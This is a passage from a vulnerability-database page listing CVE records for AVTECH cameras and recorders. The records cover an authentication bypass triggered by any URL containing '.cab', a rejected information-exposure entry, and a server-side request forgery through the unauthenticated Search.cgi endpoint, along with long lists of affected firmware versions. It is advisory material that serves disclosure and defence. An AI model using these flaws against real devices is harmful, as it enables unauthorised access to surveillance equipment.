Affected: 1014B-1002B-1006B-1002B Affected: 1015-1001-1006-1003 Affected: 1015-1002-1006-1003 Affected: 1015-1002-1007-1002 Affected: 1015-1003-1008-1003 Affected: 1015-1005-1009-1004 Affected: 1015-1006-1004-1002 Affected: 1015-1006-1005-1002 Affected: 1015-1006-1008-1002 Affected: 1015C-1004C-1003C-1005C Affected: 1015K-1006K-1008PO-1002K Affected: 1016-1002-1007-1002 Affected: 1016-1006-1013-1002 Affected: 1016-1007-1009-1003 Affected: 1016-1007-1011-1003 Affected: 1017-1002-1007-1003 Affected: 1017-1003-1007-1003 Affected: 1017-1003-1009-1003 Affected: 1017-1005-1004-1005 Affected: 1017-1006-1013-1002 Affected: 1017-1013-1014-1005 Affected: 1018-1003-1005-1004 Affected: 1018-1003-1008-1003 Affected: 1018-1003-1008-1004 Affected: 1018-1003-1008PO-1003 Affected: 1018-1004-1005-1005 Affected: 1018-1007-1009-1003 Affected: 1018-1012-1011-1010 Affected: 1019-1004-1006-1005 Affected: 1019-1007-1009-1003 Affected: 1020-1003-1008-1003 Affected: 1020-1003-1008-1004 Affected: 1020-1004-1007-1006 Affected: 1020-1007-1008-1003 Affected: 1020-1007-1009-1003 Affected: 1021-1003-1008-1003 Affected: 1021-1003-1008-1004 Affected: 1021-1005-1006-1005 Affected: 1021-1005-1008-1006 Affected: 1021-1006-1015-1002 Affected: 1021-1007-1010-1003 Affected: 1022-1005-1007-1005 Affected: 1022-1005-1009-1007 Affected: 1022-1006-1015-1002 Affected: 1022-1013-1014-1010 Affected: 1022-1014-1016-1002-FFFF Affected: 1022Y-1014Y-1016Y-1002Y-FFFF Affected: 1023-1005-1008-1006 Affected: 1023-1007-1016-1003 Affected: 1024-1019-1019-1007 Affected: 1025-1006-1010-1007 Affected: 1025-1017-1017-1011 Affected: 1027-1007-1019-1003 Affected: 1027-1021-1021-1008 Affected: 1028-1021-1022-1008 Affected: 1031-1007-1022-1003 Affected: 1032-1022-1024-1008 Affected: 1033-1018-1021-1012 Affected: 1035-1005-1005-1004 Affected: 1035-1005-1005-1005 Affected: 1035-1005-1005-1005P Affected: 1035-1007-1024-1003 Affected: 1035-1024-1025-1008 Affected: 1036-1005-1006-1005 Affected: 1036-1007-1024-1003 Affected: 1036-1014-1016-1016 Affected: 1037-1024-1027-1008 Affected: 1037-1025-1027-1008 Affected: 1038-1021-1024-1012 Affected: 1038-1021-1024-1012-A5 Affected: 1038-1025-1028-1008 Affected: 1039-1005-1008-1004 Affected: 1039-1005-1008-1005 Affected: 1039-1014-1017-1016 Affected: 1039D-1014D-1017D-1016D Affected: 1040-1026-1029-1008 Affected: 1041-1005-1009-1005 Affected: 1042-1026-1030-1008 Affected: 1044-1026-1030-1008 Affected: 1044-1026-1031-1008 Affected: 1045-1015-1020-1018 Affected: 1046-1027-1032-1008 Affected: 1047-1027-1031-1008 Affected: 1049-1027-1033-1008 Affected: 1050-1027-1034-1008 Affected: 1050-1027-1036-1008 Affected: 1051-1027-1035-1008 Affected: 1051CZ-1028-1037-1008 Affected: 1052-1027-1034-1008 Affected: 1052-1028-1038-1008 Affected: 1052A-1028-1038A-1008 Affected: 1054-1027-1036-1008 Affected: 1054-1028-1036-1008 Affected: 1055-1028-1036-1008 Affected: 1056-1028-1037-1008 Affected: 1058-1028-1039-1008 Affected: 1062-1028-1041-1008 Affected: 1065-1029-1043-1008 Affected: 1068-1029-1043-1008 Affected: 1069-1029-1043-1008 Affected: 1071-1029-1044-1008 Affected: 1077-1017-1035-1007 Affected: 1077-1017-1035-1007-A6 Affected: 1077-1017-1035-1007-D4 Affected: 1077-1017-1035-1007-D705FF Affected: 1078-1017-1036-1007 Affected: 1078-1017-1036-1007-A6 Affected: 1078-1017-1036-1007-D707FF Affected: 1079-1017-1037-1007 Affected: 1079-1017-1037-1007-D4 Affected: 1W77-1W17-1W35-1W07-A6 Affected: A077-1017-A035-1007 Affected: A077-1017-A035-1007-A6 Affected: A1035-1024-A1025-1008 Affected: A1038-1025-A1028-1008-D4 Affected: S681-S681-S681-S681 Affected: S749-S749-S749-S749 Affected: S818-S818-S818-S818 Affected: S820-S820-S820-S820 Affected: S823-S823-S823-S823 Affected: S914V-S914V-S914V-S914V Affected: S984-S984-S984-S984 |
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34053",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:46:03.365792Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:46:09.474Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"streamd web server",
"request URL parameter"
],
"product": "IP camera, DVR, and NVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "1000-1000-1000-1000"
},
{
"status": "affected",
"version": "1000C-1000C-1000C-1000C"
},
{
"status": "affected",
"version": "1001-1000-1000-1000"
},
{
"status": "affected",
"version": "1001-1001-1000-1000"
},
{
"status": "affected",
"version": "1002-1000-1000-1000"
},
{
"status": "affected",
"version": "1002-1002-1000-1002"
},
{
"status": "affected",
"version": "1002D-1000D-1000D-1000D"
},
{
"status": "affected",
"version": "1003-1000-1000-1001"
},
{
"status": "affected",
"version": "1003-1001-1001-1000"
},
{
"status": "affected",
"version": "1003-1002-1001-1000"
},
{
"status": "affected",
"version": "1004-1000-1000-1000"
},
{
"status": "affected",
"version": "1004-1001-1001-1001"
},
{
"status": "affected",
"version": "1004-1003-1001-1002"
},
{
"status": "affected",
"version": "1004-1003-1002-1001"
},
{
"status": "affected",
"version": "1004A-1001A-1002A-1000A"
},
{
"status": "affected",
"version": "1005-1002-1001-1002"
},
{
"status": "affected",
"version": "1005-1003-1001-1002"
},
{
"status": "affected",
"version": "1005-1004-1002-1001"
},
{
"status": "affected",
"version": "1005A-1001A-1002A-1001A"
},
{
"status": "affected",
"version": "1005D-1001D-1002D-1001D"
},
{
"status": "affected",
"version": "1006-1002-1001-1002"
},
{
"status": "affected",
"version": "1006-1004-1003-1001"
},
{
"status": "affected",
"version": "1007-1001-1003-1001"
},
{
"status": "affected",
"version": "1007-1001-1004-1003"
},
{
"status": "affected",
"version": "1007-1002-1001-1003"
},
{
"status": "affected",
"version": "1007-1002-1003-1002"
},
{
"status": "affected",
"version": "1007-1004-1003-1001"
},
{
"status": "affected",
"version": "1008-1001-1003-1002"
},
{
"status": "affected",
"version": "1008-1004-1004-1001"
},
{
"status": "affected",
"version": "1008D-1003D-1004D-1002D"
},
{
"status": "affected",
"version": "1008J-1004J-1004J-1001J"
},
{
"status": "affected",
"version": "1009-1001-1004-1001"
},
{
"status": "affected",
"version": "1009-1002-1005-1003"
},
{
"status": "affected",
"version": "1009-1003-1005-1002"
},
{
"status": "affected",
"version": "1010-1001-1004-1001"
},
{
"status": "affected",
"version": "1010-1001-1004-1002"
},
{
"status": "affected",
"version": "1010-1003-1005-1002"
},
{
"status": "affected",
"version": "1010-1003-1006-1003"
},
{
"status": "affected",
"version": "1010-1003-1006-1004"
},
{
"status": "affected",
"version": "1010-1004-1007-1001"
},
{
"status": "affected",
"version": "1010J-1001J-1004J-1001J"
},
{
"status": "affected",
"version": "1010N-1003N-1005N-1002N"
},
{
"status": "affected",
"version": "1011-1001-1002A-1002"
},
{
"status": "affected",
"version": "1011-1001-1002D-1002"
},
{
"status": "affected",
"version": "1011-1001-1003-1002"
},
{
"status": "affected",
"version": "1011-1001-1004-1002"
},
{
"status": "affected",
"version": "1011-1001-1005-1002"
},
{
"status": "affected",
"version": "1011-1004-1005-1002"
},
{
"status": "affected",
"version": "1012-1001-1005-1002"
},
{
"status": "affected",
"version": "1012-1001-1005-1003"
},
{
"status": "affected",
"version": "1012-1001-1005PO-1002"
},
{
"status": "affected",
"version": "1012-1003-1007-1002"
},
{
"status": "affected",
"version": "1012-1003-1007-1004"
},
{
"status": "affected",
"version": "1013-1001-1005-1003"
},
{
"status": "affected",
"version": "1013-1002-1006-1002"
},
{
"status": "affected",
"version": "1013-1003-1008-1003"
},
{
"status": "affected",
"version": "1013-1004-1008-1004"
},
{
"status": "affected",
"version": "1013-1005-1005-1002"
},
{
"status": "affected",
"version": "1013-1005-1007-1002"
},
{
"status": "affected",
"version": "1013K-1005K-1007PO-1002K"
},
{
"status": "affected",
"version": "1014-1002-1006-1002"
},
{
"status": "affected",
"version": "1014-1002-1006-1003"
},
{
"status": "affected",
"version": "1014-1003-1008-1003"
},
{
"status": "affected",
"version": "1014-1005-1008-1002"
},
{
"status": "affected",
"version": "1014B-1002B-1006B-1002B"
},
{
"status": "affected",
"version": "1015-1001-1006-1003"
},
{
"status": "affected",
"version": "1015-1002-1006-1003"
},
{
"status": "affected",
"version": "1015-1002-1007-1002"
},
{
"status": "affected",
"version": "1015-1003-1008-1003"
},
{
"status": "affected",
"version": "1015-1005-1009-1004"
},
{
"status": "affected",
"version": "1015-1006-1004-1002"
},
{
"status": "affected",
"version": "1015-1006-1005-1002"
},
{
"status": "affected",
"version": "1015-1006-1008-1002"
},
{
"status": "affected",
"version": "1015C-1004C-1003C-1005C"
},
{
"status": "affected",
"version": "1015K-1006K-1008PO-1002K"
},
{
"status": "affected",
"version": "1016-1002-1007-1002"
},
{
"status": "affected",
"version": "1016-1006-1013-1002"
},
{
"status": "affected",
"version": "1016-1007-1009-1003"
},
{
"status": "affected",
"version": "1016-1007-1011-1003"
},
{
"status": "affected",
"version": "1017-1002-1007-1003"
},
{
"status": "affected",
"version": "1017-1003-1007-1003"
},
{
"status": "affected",
"version": "1017-1003-1009-1003"
},
{
"status": "affected",
"version": "1017-1005-1004-1005"
},
{
"status": "affected",
"version": "1017-1006-1013-1002"
},
{
"status": "affected",
"version": "1017-1013-1014-1005"
},
{
"status": "affected",
"version": "1018-1003-1005-1004"
},
{
"status": "affected",
"version": "1018-1003-1008-1003"
},
{
"status": "affected",
"version": "1018-1003-1008-1004"
},
{
"status": "affected",
"version": "1018-1003-1008PO-1003"
},
{
"status": "affected",
"version": "1018-1004-1005-1005"
},
{
"status": "affected",
"version": "1018-1007-1009-1003"
},
{
"status": "affected",
"version": "1018-1012-1011-1010"
},
{
"status": "affected",
"version": "1019-1004-1006-1005"
},
{
"status": "affected",
"version": "1019-1007-1009-1003"
},
{
"status": "affected",
"version": "1020-1003-1008-1003"
},
{
"status": "affected",
"version": "1020-1003-1008-1004"
},
{
"status": "affected",
"version": "1020-1004-1007-1006"
},
{
"status": "affected",
"version": "1020-1007-1008-1003"
},
{
"status": "affected",
"version": "1020-1007-1009-1003"
},
{
"status": "affected",
"version": "1021-1003-1008-1003"
},
{
"status": "affected",
"version": "1021-1003-1008-1004"
},
{
"status": "affected",
"version": "1021-1005-1006-1005"
},
{
"status": "affected",
"version": "1021-1005-1008-1006"
},
{
"status": "affected",
"version": "1021-1006-1015-1002"
},
{
"status": "affected",
"version": "1021-1007-1010-1003"
},
{
"status": "affected",
"version": "1022-1005-1007-1005"
},
{
"status": "affected",
"version": "1022-1005-1009-1007"
},
{
"status": "affected",
"version": "1022-1006-1015-1002"
},
{
"status": "affected",
"version": "1022-1013-1014-1010"
},
{
"status": "affected",
"version": "1022-1014-1016-1002-FFFF"
},
{
"status": "affected",
"version": "1022Y-1014Y-1016Y-1002Y-FFFF"
},
{
"status": "affected",
"version": "1023-1005-1008-1006"
},
{
"status": "affected",
"version": "1023-1007-1016-1003"
},
{
"status": "affected",
"version": "1024-1019-1019-1007"
},
{
"status": "affected",
"version": "1025-1006-1010-1007"
},
{
"status": "affected",
"version": "1025-1017-1017-1011"
},
{
"status": "affected",
"version": "1027-1007-1019-1003"
},
{
"status": "affected",
"version": "1027-1021-1021-1008"
},
{
"status": "affected",
"version": "1028-1021-1022-1008"
},
{
"status": "affected",
"version": "1031-1007-1022-1003"
},
{
"status": "affected",
"version": "1032-1022-1024-1008"
},
{
"status": "affected",
"version": "1033-1018-1021-1012"
},
{
"status": "affected",
"version": "1035-1005-1005-1004"
},
{
"status": "affected",
"version": "1035-1005-1005-1005"
},
{
"status": "affected",
"version": "1035-1005-1005-1005P"
},
{
"status": "affected",
"version": "1035-1007-1024-1003"
},
{
"status": "affected",
"version": "1035-1024-1025-1008"
},
{
"status": "affected",
"version": "1036-1005-1006-1005"
},
{
"status": "affected",
"version": "1036-1007-1024-1003"
},
{
"status": "affected",
"version": "1036-1014-1016-1016"
},
{
"status": "affected",
"version": "1037-1024-1027-1008"
},
{
"status": "affected",
"version": "1037-1025-1027-1008"
},
{
"status": "affected",
"version": "1038-1021-1024-1012"
},
{
"status": "affected",
"version": "1038-1021-1024-1012-A5"
},
{
"status": "affected",
"version": "1038-1025-1028-1008"
},
{
"status": "affected",
"version": "1039-1005-1008-1004"
},
{
"status": "affected",
"version": "1039-1005-1008-1005"
},
{
"status": "affected",
"version": "1039-1014-1017-1016"
},
{
"status": "affected",
"version": "1039D-1014D-1017D-1016D"
},
{
"status": "affected",
"version": "1040-1026-1029-1008"
},
{
"status": "affected",
"version": "1041-1005-1009-1005"
},
{
"status": "affected",
"version": "1042-1026-1030-1008"
},
{
"status": "affected",
"version": "1044-1026-1030-1008"
},
{
"status": "affected",
"version": "1044-1026-1031-1008"
},
{
"status": "affected",
"version": "1045-1015-1020-1018"
},
{
"status": "affected",
"version": "1046-1027-1032-1008"
},
{
"status": "affected",
"version": "1047-1027-1031-1008"
},
{
"status": "affected",
"version": "1049-1027-1033-1008"
},
{
"status": "affected",
"version": "1050-1027-1034-1008"
},
{
"status": "affected",
"version": "1050-1027-1036-1008"
},
{
"status": "affected",
"version": "1051-1027-1035-1008"
},
{
"status": "affected",
"version": "1051CZ-1028-1037-1008"
},
{
"status": "affected",
"version": "1052-1027-1034-1008"
},
{
"status": "affected",
"version": "1052-1028-1038-1008"
},
{
"status": "affected",
"version": "1052A-1028-1038A-1008"
},
{
"status": "affected",
"version": "1054-1027-1036-1008"
},
{
"status": "affected",
"version": "1054-1028-1036-1008"
},
{
"status": "affected",
"version": "1055-1028-1036-1008"
},
{
"status": "affected",
"version": "1056-1028-1037-1008"
},
{
"status": "affected",
"version": "1058-1028-1039-1008"
},
{
"status": "affected",
"version": "1062-1028-1041-1008"
},
{
"status": "affected",
"version": "1065-1029-1043-1008"
},
{
"status": "affected",
"version": "1068-1029-1043-1008"
},
{
"status": "affected",
"version": "1069-1029-1043-1008"
},
{
"status": "affected",
"version": "1071-1029-1044-1008"
},
{
"status": "affected",
"version": "1077-1017-1035-1007"
},
{
"status": "affected",
"version": "1077-1017-1035-1007-A6"
},
{
"status": "affected",
"version": "1077-1017-1035-1007-D4"
},
{
"status": "affected",
"version": "1077-1017-1035-1007-D705FF"
},
{
"status": "affected",
"version": "1078-1017-1036-1007"
},
{
"status": "affected",
"version": "1078-1017-1036-1007-A6"
},
{
"status": "affected",
"version": "1078-1017-1036-1007-D707FF"
},
{
"status": "affected",
"version": "1079-1017-1037-1007"
},
{
"status": "affected",
"version": "1079-1017-1037-1007-D4"
},
{
"status": "affected",
"version": "1W77-1W17-1W35-1W07-A6"
},
{
"status": "affected",
"version": "A077-1017-A035-1007"
},
{
"status": "affected",
"version": "A077-1017-A035-1007-A6"
},
{
"status": "affected",
"version": "A1035-1024-A1025-1008"
},
{
"status": "affected",
"version": "A1038-1025-A1028-1008-D4"
},
{
"status": "affected",
"version": "S681-S681-S681-S681"
},
{
"status": "affected",
"version": "S749-S749-S749-S749"
},
{
"status": "affected",
"version": "S818-S818-S818-S818"
},
{
"status": "affected",
"version": "S820-S820-S820-S820"
},
{
"status": "affected",
"version": "S823-S823-S823-S823"
},
{
"status": "affected",
"version": "S914V-S914V-S914V-S914V"
},
{
"status": "affected",
"version": "S984-S984-S984-S984"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices\u2019 streamd web server. The strstr() function is used to identify \".cab\" requests, allowing any URL containing \".cab\" to bypass authentication and access protected endpoints."
}
],
"value": "An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices\u2019 streamd web server. The strstr() function is used to identify \".cab\" requests, allowing any URL containing \".cab\" to bypass authentication and access protected endpoints."
}
],
"impacts": [
{
"capecId": "CAPEC-115",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-115 Authentication Bypass"
}
]
},
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-290",
"description": "CWE-290 Authentication Bypass by Spoofing",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:15.581Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP camera, DVR, and NVR Devices Authentication Bypass via .cab Path Manipulation",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34053",
"datePublished": "2025-07-01T14:45:02.858Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2026-04-07T14:09:15.581Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34052 (GCVE-0-2025-34052)
Vulnerability from cvelistv5 – Published: 2025-07-01 14:44 – Updated: 2025-10-09 15:06
VLAI
An unauthenticated endpoint that exposes firmware version, MAC address, and supported codecs is not indicative of a security boundary being crossed, as this metadata is not inherently sensitive and commonly used for legitimate fingerprinting and discovery.
Show details on NVD website{
"containers": {
"cna": {
"providerMetadata": {
"dateUpdated": "2025-10-09T15:06:37.810Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"rejectedReasons": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An unauthenticated endpoint that exposes firmware version, MAC address, and supported codecs is not indicative of a security boundary being crossed, as this metadata is not inherently sensitive and commonly used for legitimate fingerprinting and discovery."
}
],
"value": "An unauthenticated endpoint that exposes firmware version, MAC address, and supported codecs is not indicative of a security boundary being crossed, as this metadata is not inherently sensitive and commonly used for legitimate fingerprinting and discovery."
}
],
"x_generator": {
"engine": "Vulnogram 0.1.0-dev"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34052",
"datePublished": "2025-07-01T14:44:40.785Z",
"dateRejected": "2025-10-09T15:03:04.389Z",
"dateReserved": "2025-04-15T19:15:22.548Z",
"dateUpdated": "2025-10-09T15:06:37.810Z",
"state": "REJECTED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-34051 (GCVE-0-2025-34051)
Vulnerability from cvelistv5 – Published: 2025-07-01 14:44 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH DVR Devices Server-Side Request Forgery
Summary
A server-side request forgery vulnerability exists in multiple firmware versions of AVTECH DVR devices that exposes the /cgi-bin/nobody/Search.cgi?action=cgi_query endpoint without authentication. An attacker can manipulate the ip, port, and queryb64str parameters to make arbitrary HTTP requests from the DVR to internal or external systems, potentially exposing sensitive data or interacting with internal services.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | DVR devices |
Affected:
1001-1000-1000-1000
Affected: 1001-1000-1001-1001 Affected: 1002-1000-1002-1001 Unaffected: 1002-1001-1000-1000 Affected: 1002-1001-1001-1001 Affected: 1004-1002-1001-1000 Affected: 1004-1002-1003-1000-FFFF Affected: 1004V-1002V-1003V-1001V Affected: 1004Y-1002Y-1001EJ-1000Y Affected: 1004Y-1002Y-1001Y-1000Y Affected: 1005-1002-1002-1000 Affected: 1005-1002-1004-1001 Affected: 1006-1001-1003-1004 Affected: 1006-1002-1003-1000 Affected: 1006Y-1002Y-1003Y-1000Y Affected: 1007-1002-1004-1000 Affected: 1007-1003-1003-1002 Affected: 1007-1003-1005-1001 Affected: 1007E-1003E-1005EJ-1001E Affected: 1007V-1003V-1005V-1001V Affected: 1007Y-1002Y-1004Y-1000Y Affected: 1008-1002-1005-1000 Affected: 1008-1004-1003-1002 Affected: 1009-1003-1005-1006 Affected: 1009-1003-1006-1001 Affected: 1009-1007-1007-1000-FFFF Affected: 1009Y-1003Y-1006Y-1001Y Affected: 1010-1004-1007-1001 Affected: 1010-1005-1005-1002 Affected: 1011-1004-1005-1006 Affected: 1011-1005-1007-1001 Affected: 1011-1005-1007EJ-1001 Affected: 1011-1005-1008-1002 Affected: 1012-1004-1005-1006 Affected: 1012-1005-1007-1002 Affected: 1012-1006-1007-1001 Affected: 1012-1008-1009-1000-FFFF Affected: 1014-1005-1009-1002 Affected: 1014-1007-1009-1001 Affected: 1014-1010-1010-1000-FFFF Affected: 1014Y-1007Y-1009Y-1001Y Affected: 1015-1006-1010-1003 Affected: 1015-1007-1007-1007 Affected: 1015-1007-1010-1001 Affected: 1015-1010-1011-1000-FFFF Affected: 1015Y-1007Y-1010Y-1001Y Affected: 1016-1007-1005-1001 Affected: 1016-1007-1011-1001 Affected: 1016-1007-1011-1003 Affected: 1016-1008-1007-1007 Affected: 1016Y-1007Y-1011Y-1001Y Affected: 1017-1008-1012-1002 Affected: 1017-1009-1008-1008 Affected: 1017-1011-1013-1001-FFFF Affected: 1017f-1011f-1013f-1001f-FFFF Affected: 1017Y-1008Y-1012Y-1002Y Affected: 1018-1008-1012-1004 Affected: 1019-1009-1013-1003 Affected: 1019-1010-1009-1009 Affected: 1019c-1012c-1014c-1001c-FFFF Affected: 1021-1011-1010-1009 Affected: 1022-1012-1011-1009 Affected: 1022-1014-1016-1002-FFFF Affected: 1022Y-1014Y-1016Y-1002Y-FFFF Affected: 1023-1013-1011-1009 Affected: 1023-1014-1017-1002-FFFF Affected: 1025-1014-1013-1009 Affected: 1026-1014-1014-1009 Affected: 1027-1014-1015-1009 Affected: S968-S968-S968-S968 Affected: V171P-V171P-V171P-V171P Affected: V189-V189-V189-V189 |
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34051",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T14:57:37.177556Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T14:59:04.311Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"Search.cgi endpoint",
"ip parameter",
"port parameter",
"queryb64str parameter"
],
"product": "DVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "1001-1000-1000-1000"
},
{
"status": "affected",
"version": "1001-1000-1001-1001"
},
{
"status": "affected",
"version": "1002-1000-1002-1001"
},
{
"status": "unaffected",
"version": "1002-1001-1000-1000"
},
{
"status": "affected",
"version": "1002-1001-1001-1001"
},
{
"status": "affected",
"version": "1004-1002-1001-1000"
},
{
"status": "affected",
"version": "1004-1002-1003-1000-FFFF"
},
{
"status": "affected",
"version": "1004V-1002V-1003V-1001V"
},
{
"status": "affected",
"version": "1004Y-1002Y-1001EJ-1000Y"
},
{
"status": "affected",
"version": "1004Y-1002Y-1001Y-1000Y"
},
{
"status": "affected",
"version": "1005-1002-1002-1000"
},
{
"status": "affected",
"version": "1005-1002-1004-1001"
},
{
"status": "affected",
"version": "1006-1001-1003-1004"
},
{
"status": "affected",
"version": "1006-1002-1003-1000"
},
{
"status": "affected",
"version": "1006Y-1002Y-1003Y-1000Y"
},
{
"status": "affected",
"version": "1007-1002-1004-1000"
},
{
"status": "affected",
"version": "1007-1003-1003-1002"
},
{
"status": "affected",
"version": "1007-1003-1005-1001"
},
{
"status": "affected",
"version": "1007E-1003E-1005EJ-1001E"
},
{
"status": "affected",
"version": "1007V-1003V-1005V-1001V"
},
{
"status": "affected",
"version": "1007Y-1002Y-1004Y-1000Y"
},
{
"status": "affected",
"version": "1008-1002-1005-1000"
},
{
"status": "affected",
"version": "1008-1004-1003-1002"
},
{
"status": "affected",
"version": "1009-1003-1005-1006"
},
{
"status": "affected",
"version": "1009-1003-1006-1001"
},
{
"status": "affected",
"version": "1009-1007-1007-1000-FFFF"
},
{
"status": "affected",
"version": "1009Y-1003Y-1006Y-1001Y"
},
{
"status": "affected",
"version": "1010-1004-1007-1001"
},
{
"status": "affected",
"version": "1010-1005-1005-1002"
},
{
"status": "affected",
"version": "1011-1004-1005-1006"
},
{
"status": "affected",
"version": "1011-1005-1007-1001"
},
{
"status": "affected",
"version": "1011-1005-1007EJ-1001"
},
{
"status": "affected",
"version": "1011-1005-1008-1002"
},
{
"status": "affected",
"version": "1012-1004-1005-1006"
},
{
"status": "affected",
"version": "1012-1005-1007-1002"
},
{
"status": "affected",
"version": "1012-1006-1007-1001"
},
{
"status": "affected",
"version": "1012-1008-1009-1000-FFFF"
},
{
"status": "affected",
"version": "1014-1005-1009-1002"
},
{
"status": "affected",
"version": "1014-1007-1009-1001"
},
{
"status": "affected",
"version": "1014-1010-1010-1000-FFFF"
},
{
"status": "affected",
"version": "1014Y-1007Y-1009Y-1001Y"
},
{
"status": "affected",
"version": "1015-1006-1010-1003"
},
{
"status": "affected",
"version": "1015-1007-1007-1007"
},
{
"status": "affected",
"version": "1015-1007-1010-1001"
},
{
"status": "affected",
"version": "1015-1010-1011-1000-FFFF"
},
{
"status": "affected",
"version": "1015Y-1007Y-1010Y-1001Y"
},
{
"status": "affected",
"version": "1016-1007-1005-1001"
},
{
"status": "affected",
"version": "1016-1007-1011-1001"
},
{
"status": "affected",
"version": "1016-1007-1011-1003"
},
{
"status": "affected",
"version": "1016-1008-1007-1007"
},
{
"status": "affected",
"version": "1016Y-1007Y-1011Y-1001Y"
},
{
"status": "affected",
"version": "1017-1008-1012-1002"
},
{
"status": "affected",
"version": "1017-1009-1008-1008"
},
{
"status": "affected",
"version": "1017-1011-1013-1001-FFFF"
},
{
"status": "affected",
"version": "1017f-1011f-1013f-1001f-FFFF"
},
{
"status": "affected",
"version": "1017Y-1008Y-1012Y-1002Y"
},
{
"status": "affected",
"version": "1018-1008-1012-1004"
},
{
"status": "affected",
"version": "1019-1009-1013-1003"
},
{
"status": "affected",
"version": "1019-1010-1009-1009"
},
{
"status": "affected",
"version": "1019c-1012c-1014c-1001c-FFFF"
},
{
"status": "affected",
"version": "1021-1011-1010-1009"
},
{
"status": "affected",
"version": "1022-1012-1011-1009"
},
{
"status": "affected",
"version": "1022-1014-1016-1002-FFFF"
},
{
"status": "affected",
"version": "1022Y-1014Y-1016Y-1002Y-FFFF"
},
{
"status": "affected",
"version": "1023-1013-1011-1009"
},
{
"status": "affected",
"version": "1023-1014-1017-1002-FFFF"
},
{
"status": "affected",
"version": "1025-1014-1013-1009"
},
{
"status": "affected",
"version": "1026-1014-1014-1009"
